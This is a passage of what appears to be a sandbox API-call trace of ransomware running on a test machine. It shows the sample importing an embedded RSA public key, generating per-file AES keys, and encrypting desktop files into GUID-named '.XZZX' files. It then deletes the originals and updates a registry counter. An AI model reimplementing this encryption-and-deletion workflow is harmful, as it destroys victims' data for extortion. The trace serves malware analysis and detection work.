lpOverlapped=0x0) returned 1 [0169.737] SetFilePointer (in: hFile=0x9d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xcea9 [0169.737] WriteFile (in: hFile=0x9d0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0169.737] SetFilePointer (in: hFile=0x9d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xceae [0169.737] SetErrorMode (uMode=0x1) returned 0x1 [0169.737] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0169.737] OutputDebugStringW (lpOutputString="end") [0169.737] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0169.737] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0169.737] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a5580) returned 1 [0169.738] CryptImportPublicKeyInfo (in: hCryptProv=0x43a5580, dwCertEncodingType=0x1, pInfo=0x437fcb8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437fce8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437fcf0*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x3a5510) returned 1 [0169.738] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0169.738] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0169.738] CryptEncrypt (in: hKey=0x3a5510, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0169.738] CryptEncrypt (in: hKey=0x3a5510, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a5608*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a5608*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0169.738] WriteFile (in: hFile=0x9d0, lpBuffer=0x43a5608*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a5608*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0169.738] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0169.738] WriteFile (in: hFile=0x9d0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0169.738] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0169.739] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0169.739] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x9dc) returned 0x0 [0169.739] RegQueryValueExW (in: hKey=0x9dc, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xfe, lpcbData=0x29adfdc*=0x4) returned 0x0 [0169.739] RegCloseKey (hKey=0x9dc) returned 0x0 [0169.739] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x9dc) returned 0x0 [0169.739] RegSetValueExW (in: hKey=0x9dc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xff, cbData=0x4 | out: lpData=0x29adfec*=0xff) returned 0x0 [0169.739] RegCloseKey (hKey=0x9dc) returned 0x0 [0169.739] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.739] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.739] CloseHandle (hObject=0x9d0) returned 1 [0169.739] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0169.740] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0169.740] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\5OmbcR7YDw3.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\5ombcr7ydw3.bmp")) returned 1 [0169.741] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\5OmbcR7YDw3.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\5ombcr7ydw3.bmp")) returned 0 Thread: id = 580 os_tid = 0x740 [0169.797] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0169.797] lstrcpyW (in: lpString1=0x29af460, lpString2="iyIk6.jpg" | out: lpString1="iyIk6.jpg") returned="iyIk6.jpg" [0169.797] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0169.797] SetErrorMode (uMode=0x1) returned 0x1 [0169.797] lstrcpyW (in: lpString1=0x29af860, lpString2="iyIk6.jpg" | out: lpString1="iyIk6.jpg") returned="iyIk6.jpg" [0169.797] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x4d8caceb, Data2=0x8b70, Data3=0x4be5, Data4=([0]=0xb1, [1]=0x48, [2]=0xd6, [3]=0xf5, [4]=0x2a, [5]=0x40, [6]=0xec, [7]=0xf0))) returned 0x0 [0169.797] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\iyIk6.jpg") returned 71 [0169.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0169.797] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\4F6F3FD029568B304D8CACEB2BF16F78.XZZX") returned 99 [0169.797] StrStrW (lpFirst="iyIk6.jpg", lpSrch="XZZX") returned 0x0 [0169.797] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\iyIk6.jpg", dwFileAttributes=0x20) returned 1 [0169.798] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\iyIk6.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\iyik6.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9d8 [0169.798] ReadFile (in: hFile=0x9d8, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0x12854, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0x12854, lpOverlapped=0x0) returned 1 [0169.799] CloseHandle (hObject=0x9d8) returned 1 [0169.799] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0169.799] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0169.799] SetErrorMode (uMode=0x1) returned 0x1 [0169.800] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0169.800] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a5690) returned 1 [0169.802] CryptGenKey (in: hProv=0x43a5690, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5550) returned 1 [0169.900] CryptExportKey (in: hKey=0x3a5550, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0169.900] CryptExportKey (in: hKey=0x3a5550, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0169.900] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0169.900] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0169.900] CryptDestroyKey (hKey=0x3a5550) returned 1 [0169.900] CryptReleaseContext (hProv=0x43a5690, dwFlags=0x0) returned 1 [0169.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\4F6F3FD029568B304D8CACEB2BF16F78.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\4f6f3fd029568b304d8caceb2bf16f78.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9d8 [0169.901] WriteFile (in: hFile=0x9d8, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0x12854, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0x12854, lpOverlapped=0x0) returned 1 [0169.902] SetFilePointer (in: hFile=0x9d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x12854 [0169.902] WriteFile (in: hFile=0x9d8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0169.902] SetFilePointer (in: hFile=0x9d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x12859 [0169.903] WriteFile (in: hFile=0x9d8, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x12, lpOverlapped=0x0) returned 1 [0169.903] SetFilePointer (in: hFile=0x9d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1286b [0169.903] WriteFile (in: hFile=0x9d8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0169.903] SetFilePointer (in: hFile=0x9d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x12870 [0169.903] SetErrorMode (uMode=0x1) returned 0x1 [0169.903] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0169.903] OutputDebugStringW (lpOutputString="end") [0169.903] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0169.903] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0169.903] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a5690) returned 1 [0169.904] CryptImportPublicKeyInfo (in: hCryptProv=0x43a5690, dwCertEncodingType=0x1, pInfo=0x437fd88*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437fdb8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437fdc0*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x3d11dd8) returned 1 [0169.904] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0169.904] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0169.904] CryptEncrypt (in: hKey=0x3d11dd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0169.904] CryptEncrypt (in: hKey=0x3d11dd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a5718*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a5718*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0169.904] WriteFile (in: hFile=0x9d8, lpBuffer=0x43a5718*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a5718*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0169.904] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0169.904] WriteFile (in: hFile=0x9d8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0169.904] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0169.904] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0169.904] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x9e0) returned 0x0 [0169.905] RegQueryValueExW (in: hKey=0x9e0, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xff, lpcbData=0x29adfdc*=0x4) returned 0x0 [0169.905] RegCloseKey (hKey=0x9e0) returned 0x0 [0169.905] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x9e0) returned 0x0 [0169.905] RegSetValueExW (in: hKey=0x9e0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0x100, cbData=0x4 | out: lpData=0x29adfec*=0x100) returned 0x0 [0169.905] RegCloseKey (hKey=0x9e0) returned 0x0 [0169.905] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.905] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.905] CloseHandle (hObject=0x9d8) returned 1 [0169.905] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0169.906] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0169.906] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\iyIk6.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\iyik6.jpg")) returned 1 [0169.907] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\iyIk6.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\iyik6.jpg")) returned 0 Thread: id = 581 os_tid = 0x3cc [0169.953] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0169.953] lstrcpyW (in: lpString1=0x29af460, lpString2="rVKi.xlsx" | out: lpString1="rVKi.xlsx") returned="rVKi.xlsx" [0169.953] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0169.953] SetErrorMode (uMode=0x1) returned 0x1 [0169.953] lstrcpyW (in: lpString1=0x29af860, lpString2="rVKi.xlsx" | out: lpString1="rVKi.xlsx") returned="rVKi.xlsx" [0169.953] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xb67a0b4a, Data2=0x96b7, Data3=0x4151, Data4=([0]=0xa7, [1]=0xc7, [2]=0xc5, [3]=0xc3, [4]=0x2d, [5]=0x2c, [6]=0x3d, [7]=0x62))) returned 0x0 [0169.953] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\rVKi.xlsx") returned 71 [0169.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0169.953] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\F3DB6DE6267426E7B67A0B4A290F0B2F.XZZX") returned 99 [0169.953] StrStrW (lpFirst="rVKi.xlsx", lpSrch="XZZX") returned 0x0 [0169.953] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\rVKi.xlsx", dwFileAttributes=0x20) returned 1 [0169.957] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\rVKi.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\rvki.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9dc [0169.957] ReadFile (in: hFile=0x9dc, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0xac93, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0xac93, lpOverlapped=0x0) returned 1 [0169.958] CloseHandle (hObject=0x9dc) returned 1 [0169.958] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0169.959] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0169.959] SetErrorMode (uMode=0x1) returned 0x1 [0169.959] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0169.959] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a57a0) returned 1 [0169.962] CryptGenKey (in: hProv=0x43a57a0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11398) returned 1 [0170.108] CryptExportKey (in: hKey=0x3d11398, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0170.109] CryptExportKey (in: hKey=0x3d11398, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0170.109] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0170.109] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0170.109] CryptDestroyKey (hKey=0x3d11398) returned 1 [0170.109] CryptReleaseContext (hProv=0x43a57a0, dwFlags=0x0) returned 1 [0170.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\F3DB6DE6267426E7B67A0B4A290F0B2F.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\f3db6de6267426e7b67a0b4a290f0b2f.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9dc [0170.110] WriteFile (in: hFile=0x9dc, lpBuffer=0x43b7d70*, 